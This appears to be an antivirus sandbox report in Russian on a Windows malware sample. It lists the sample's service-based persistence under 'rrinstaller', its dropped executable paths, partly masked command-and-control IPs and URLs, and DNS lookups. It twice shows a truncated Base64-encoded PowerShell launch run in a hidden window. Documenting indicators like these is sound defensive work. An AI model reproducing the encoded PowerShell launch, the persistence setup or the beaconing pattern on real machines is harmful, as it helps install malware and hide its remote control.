Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\EFS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\rrinstaller] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\rrinstaller] 'ImagePath' = '"%WINDIR%\SysWOW64\appmgmts\rrinstaller.exe"'
- 'rrinstaller' "%WINDIR%\SysWOW64\appmgmts\rrinstaller.exe"
- 'rrinstaller' %WINDIR%\SysWOW64\appmgmts\rrinstaller.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe в %WINDIR%\syswow64\appmgmts\rrinstaller.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- '19#.#02.229.74':80
- '11#.#9.11.81':7080
- '70.##.251.94':8080
- http://at###style.com/wp-admin/pB/
- http://70.##.251.94:8080/QfIm/hl0C5iZQl0/nguPC84/P5LWi42dQ/MN26dg6uk/ via 70.##.251.94
- DNS ASK at###style.com
- DNS ASK ni###angseo.com
- DNS ASK mr##ggy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...' (со скрытым окном)